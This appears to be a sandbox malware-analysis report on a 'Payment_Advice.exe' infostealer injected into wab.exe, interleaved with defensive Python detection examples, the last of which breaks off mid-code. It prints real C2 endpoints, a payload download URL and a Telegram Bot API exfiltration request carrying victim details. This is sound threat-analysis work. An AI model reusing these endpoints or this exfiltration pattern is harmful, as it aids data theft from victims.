Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 028BF2EDh | 5_2_028BF12B
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 028BFAA9h | 5_2_028BF804
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 028BF2EDh | 5_2_028BF33C
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 24492C21h | 5_2_24492970
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 244931E8h | 5_2_24492DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 5_2_24490040
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449E311h | 5_2_2449E068
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449DEB9h | 5_2_2449DC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449E769h | 5_2_2449E4C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449F019h | 5_2_2449ED70
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449EBC1h | 5_2_2449E918
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 244931E8h | 5_2_24493116
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449F471h | 5_2_2449F1C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 244931E8h | 5_2_24492DC7
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449FD21h | 5_2_2449FA78
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449F8C9h | 5_2_2449F620
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449D609h | 5_2_2449D360
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449D1B1h | 5_2_2449CF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 24490D0Dh | 5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 24491697h | 5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449DA61h | 5_2_2449D7B8
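The "4x nop then jmp" rows above are the sandbox's heuristic for inlined nop runs: compilers normally emit runs of 0x90 only as alignment padding between functions, so several nops inside a function body followed by an unconditional jump point to hand-written, obfuscated or runtime-generated code. As an added example (not part of the report and not the sandbox's own scanner), the following Python scans a raw x86 byte region for runs of 0x90 of at least a given length and decodes what follows each run: a rel32 or rel8 jmp, resolved to the destination the way the report prints it, or the mov dword ptr [ebp-14h], 0 form seen at 5_2_24490040. The load address, byte layout and function names are assumptions constructed for the example; the byte string is built inline and is not dumped from the sample.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

NOP = 0x90


@dataclass
class NopSledHit:
    va: int                # virtual address of the first nop in the run
    nops: int              # length of the nop run
    mnemonic: str          # instruction that follows the run
    target: Optional[int]  # jmp destination when that instruction is a jmp


def _decode_follow(buf: bytes, i: int, va: int) -> Tuple[str, Optional[int]]:
    """Decode the instruction at buf[i] (virtual address va) just enough for the report."""
    op = buf[i] if i < len(buf) else None
    if op == 0xE9 and i + 5 <= len(buf):                          # jmp rel32
        rel = struct.unpack_from("<i", buf, i + 1)[0]
        return "jmp", (va + 5 + rel) & 0xFFFFFFFF
    if op == 0xEB and i + 2 <= len(buf):                          # jmp rel8
        rel = struct.unpack_from("<b", buf, i + 1)[0]
        return "jmp short", (va + 2 + rel) & 0xFFFFFFFF
    if op == 0xC7 and i + 7 <= len(buf) and buf[i + 1] == 0x45:   # mov dword ptr [ebp+disp8], imm32
        disp = struct.unpack_from("<b", buf, i + 2)[0]
        imm = struct.unpack_from("<I", buf, i + 3)[0]
        sign = "-" if disp < 0 else "+"
        return f"mov dword ptr [ebp{sign}{abs(disp):02X}h], {imm:08X}h", None
    return "other", None


def find_nop_sleds(buf: bytes, base: int, min_nops: int = 4) -> List[NopSledHit]:
    """Return every run of at least min_nops 0x90 bytes in buf (mapped at base),
    with the instruction that follows the run decoded."""
    hits: List[NopSledHit] = []
    i, n = 0, len(buf)
    while i < n:
        if buf[i] != NOP:
            i += 1
            continue
        j = i
        while j < n and buf[j] == NOP:
            j += 1
        if j - i >= min_nops:
            mnemonic, target = _decode_follow(buf, j, base + j)
            hits.append(NopSledHit(base + i, j - i, mnemonic, target))
        i = j
    return hits


def describe(hit: NopSledHit) -> str:
    """Render a hit the way the report phrases it, e.g. '4x nop then jmp 028BF2EDh'."""
    if hit.target is None:
        return f"{hit.nops}x nop then {hit.mnemonic}"
    return f"{hit.nops}x nop then {hit.mnemonic} {hit.target:08X}h"


SAMPLE_BASE = 0x028BF120   # assumed load address for the constructed fragment


def build_sample() -> bytes:
    """Constructed x86 bytes for the example (not dumped from the sample)."""
    buf = bytearray()
    buf += bytes.fromhex("558BEC")             # push ebp; mov ebp, esp
    buf += b"\x90\x90"                         # 2x nop: below the threshold, must be ignored
    buf += bytes.fromhex("33C0")               # xor eax, eax
    buf += b"\x90" * 4                         # 4x nop ...
    jmp_va = SAMPLE_BASE + len(buf)
    buf += b"\xE9" + struct.pack("<i", 0x028BF2ED - (jmp_va + 5))   # ... then jmp 028BF2EDh
    buf += b"\x90" * 5                         # 5x nop ...
    buf += bytes.fromhex("C745EC00000000")     # ... then mov dword ptr [ebp-14h], 00000000h
    buf += b"\x90" * 4                         # 4x nop ...
    buf += b"\xEB\x10"                         # ... then jmp short +10h
    buf += b"\xC3"                             # ret
    return bytes(buf)


if __name__ == "__main__":
    for hit in find_nop_sleds(build_sample(), SAMPLE_BASE):
        print(f"{hit.va:08X}: {describe(hit)}")
```

The threshold of four matches the report's rows; on a real dump, run it over the executable regions of the injected process rather than the on-disk image, because the flagged addresses here (028Bxxxx, 2449xxxx) lie outside wab.exe's own mapped image.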
Source: global traffic | HTTP traffic detected:
    GET /wp-includes/QMHHyMk225.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.reap.skyestates.com.mt
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (7 near-identical requests, 5 with and 2 without the Connection header):
    GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    (text parameter URL-decoded, one line per CRLF:
        PC Name:468325
        Date and Time: 26/07/2024 / 04:58:36
        Country Name:
        [ 468325 Clicked on the File If you see nothing this's mean the system storage's empty. ]
    The bot token in the path and the chat_id are empty in this capture.)
Source: global traffic | HTTP traffic detected (10 near-identical requests, 7 with and 3 without the Connection header):
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://electromac.com.bo
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.electromac.com.bo
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.i.lencr.org/01
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.o.lencr.org0#
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/cps0%
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0.
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN
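The HTTP captures and the URL strings dumped from wab.exe memory describe the same activity from two angles: a binary blob fetched from a WordPress path, repeated public-IP and geolocation lookups, a Telegram Bot API sendMessage call whose text parameter carries host details, and a set of endpoints on port 8081 (one bare IP, three free dynamic-DNS names). As an added example that is not the report's own tooling, this Python re-splits the captured requests (whose header line breaks were lost in extraction), decodes the Telegram message into fields, and classifies every endpoint from both the captures and the memory strings into the buckets an analyst triages first. The inputs are copied from the rows above (one request of each kind); the category names, the header list used for re-splitting and the dynamic-DNS suffix list are assumptions of the example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Header names present in the captures; the lookahead re-splits requests whose CRLFs were lost.
_HEADER_SPLIT = re.compile(
    r"(?=(?:User-Agent|Host|Connection|Cache-Control|Content-Type|Content-Length): )")

# Assumed lists for the example, seeded from the hosts in this report; extend per case.
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
DYNDNS_SUFFIXES = ("duckdns.org", "dns.army", "kozow.com")
_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def split_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """'GET / HTTP/1.1Host: a.orgConnection: Keep-Alive' -> ('GET', '/', {'Host': 'a.org', ...})."""
    parts = [p for p in _HEADER_SPLIT.split(raw) if p]
    method, path, _version = parts[0].strip().split(" ", 2)
    headers: Dict[str, str] = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value.strip()
    return method, path, headers


def classify(host: str, path: str) -> str:
    """Bucket an endpoint by what the traffic pattern usually means in an infostealer triage."""
    h = host.lower()
    if h == "api.telegram.org" and path.lower().startswith("/bot"):
        return "telegram-bot-api"        # sendMessage with host details in the text parameter
    if h in IP_LOOKUP_HOSTS:
        return "ip-lookup"               # victim public IP / geolocation before reporting
    if h.endswith(DYNDNS_SUFFIXES):
        return "dynamic-dns"             # name on a free dynamic-DNS provider
    if _IPV4.fullmatch(h):
        return "bare-ip"                 # endpoint addressed by IP, no DNS at all
    if path.lower().endswith(".bin"):
        return "binary-download"         # opaque blob fetched from a web path
    return "other"


def decode_telegram_message(path: str) -> Dict[str, object]:
    """Pull token, chat_id and the URL-decoded text out of a /bot<token>/sendMessage request."""
    u = urlsplit(path)
    m = re.fullmatch(r"/bot([^/]*)/sendMessage", u.path)
    params = dict(parse_qsl(u.query, keep_blank_values=True))
    text = params.get("text", "")
    fields: Dict[str, str] = {}
    for line in text.split("\r\n"):                 # one "Key: value" pair per CRLF-separated line
        key, sep, value = line.partition(":")
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    return {"token": m.group(1) if m else None, "chat_id": params.get("chat_id", ""),
            "text": text, "fields": fields}


def triage(requests: List[str], strings: List[str]) -> List[Dict[str, object]]:
    """Classify captured requests and URL strings from memory into one record list."""
    records: List[Dict[str, object]] = []
    for raw in requests:
        _method, path, headers = split_request(raw)
        host = headers.get("Host", "")
        rec: Dict[str, object] = {"source": "capture", "host": host, "port": None, "path": path,
                                  "category": classify(host, path),
                                  "user_agent": headers.get("User-Agent")}
        if rec["category"] == "telegram-bot-api":
            rec["message"] = decode_telegram_message(path)
        records.append(rec)
    for s in strings:
        u = urlsplit(s)
        host = u.hostname or ""
        records.append({"source": "memory-string", "host": host, "port": u.port, "path": u.path,
                        "category": classify(host, u.path), "user_agent": None})
    return records


# Inputs copied from the report rows above (one request of each kind; repeats omitted).
CAPTURED_REQUESTS = [
    "GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache",
    "GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive",
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive",
    "GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive",
]
MEMORY_STRINGS = [
    "http://51.38.247.67:8081/_send_.php?L",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://varders.kozow.com:8081",
    "https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin",
]

if __name__ == "__main__":
    for r in triage(CAPTURED_REQUESTS, MEMORY_STRINGS):
        port = f":{r['port']}" if r["port"] else ""
        print(f"{r['category']:16} {r['host']}{port}{r['path']}")
        if "message" in r:
            print("                 telegram text fields:", r["message"]["fields"])
```

Two details worth keeping in mind when reusing this: the Telegram bot token normally sits between /bot and /sendMessage, so a non-empty capture would hand you the attacker's token and chat_id directly from the URL; and the two different User-Agent strings (a Firefox 121 string for the .bin download, an MSIE 6.0 string for checkip.dyndns.org) are themselves a usable network signature, because no single legitimate client switches between them.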
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_00404B0E, 0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04E5EAD8, 2_2_04E5F3A8, 2_2_04E5E790, 2_2_0799C4D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function:
    5_2_028B5362, 5_2_028BA088, 5_2_028BC146, 5_2_028BC738, 5_2_028BC468, 5_2_028BD599, 5_2_028BCA08, 5_2_028BF804,
    5_2_028BCFAB, 5_2_028B6FC8, 5_2_028BCCD8, 5_2_028BEC18, 5_2_028B39EE, 5_2_028B29EC, 5_2_028B3E09, 5_2_028BEC0B,
    5_2_028BFC50, 5_2_05BD2660, 5_2_05BD55E0, 5_2_05BDBF40, 5_2_05BD39BC, 5_2_24492970, 5_2_24492288, 5_2_24495290,
    5_2_24491BA8, 5_2_244997B0, 5_2_24490040, 5_2_2449E068, 5_2_2449E067, 5_2_2449DC01, 5_2_2449DC10, 5_2_2449003F,
    5_2_2449E4C0, 5_2_2449E4BF, 5_2_24492963, 5_2_2449ED70, 5_2_2449E918, 5_2_2449E917, 5_2_2449F1C8, 5_2_24498DF9,
    5_2_24499590, 5_2_2449F1B9, 5_2_24499E46, 5_2_2449FA78, 5_2_24492278, 5_2_24498E08, 5_2_2449F620, 5_2_24499ED8,
    5_2_24495283, 5_2_2449D360, 5_2_2449CF08, 5_2_24490B28, 5_2_24490B30, 5_2_24491B97, 5_2_2449D7B8
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded:
    apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll,
    riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll,
    wintypes.dll (3 load events), textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded:
    atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll,
    rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll,
    msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll,
    rasadhlp.dll, ntmarta.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded:
    wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll,
    ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll,
    netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll,
    dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, mscoree.dll, version.dll,
    vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (2 load events), uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll,
    dhcpcsvc6.dll, dhcpcsvc.dll, secur32.dll
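The module list for wab.exe is the most telling part of this section. wab.exe is the native Windows Address Book binary, yet here it loads mscoree.dll, vcruntime140_clr0400.dll and ucrtbase_clr0400.dll, the runtime of a .NET program, together with wininet, winhttp and schannel for the HTTPS traffic seen earlier. A native process hosting the CLR is a strong sign of injected managed code, and the same check works over Sysmon image-load events (Event ID 7) on a live estate. The following Python is an added example, not part of the report or of any product: it groups image loads per process and flags CLR modules in any process outside an assumed allowlist of legitimate .NET hosts, noting when the same process also pulled in the network and TLS stack. The event records are constructed to mirror the rows above and are not a real log; the allowlist and the module sets are assumptions to tune per environment.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# Modules that only appear when the .NET runtime is hosted in the process.
CLR_MODULES = {"mscoree.dll", "mscoreei.dll", "clr.dll", "clrjit.dll", "coreclr.dll",
               "vcruntime140_clr0400.dll", "ucrtbase_clr0400.dll"}
# Network and TLS modules worth calling out next to an unexpected CLR load.
NET_MODULES = {"wininet.dll", "winhttp.dll", "schannel.dll"}
# Assumed allowlist of processes that legitimately host the CLR; tune per environment.
KNOWN_CLR_HOSTS = {"powershell.exe", "pwsh.exe", "msbuild.exe", "installutil.exe",
                   "regasm.exe", "regsvcs.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_image_loads(events: Iterable[Dict[str, str]]) -> Dict[str, Dict[str, object]]:
    """Group Sysmon Event ID 7 style records ({'Image', 'ImageLoaded'}) per process and
    return, for each process with a finding, its module set and the reasons."""
    loaded: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        loaded[ev["Image"]].add(basename(ev["ImageLoaded"]))
    findings: Dict[str, Dict[str, object]] = {}
    for image, mods in loaded.items():
        reasons: List[str] = []
        clr = sorted(mods & CLR_MODULES)
        if clr and basename(image) not in KNOWN_CLR_HOSTS:
            reasons.append("CLR runtime loaded into a non-.NET host: " + ", ".join(clr))
            net = sorted(mods & NET_MODULES)
            if net:
                reasons.append("same process also loaded the network/TLS stack: " + ", ".join(net))
        if reasons:
            findings[image] = {"modules": mods, "findings": reasons}
    return findings


def sample_events() -> List[Dict[str, str]]:
    """Constructed records mirroring the 'Section loaded' rows above; not a real Sysmon log."""
    rows = [
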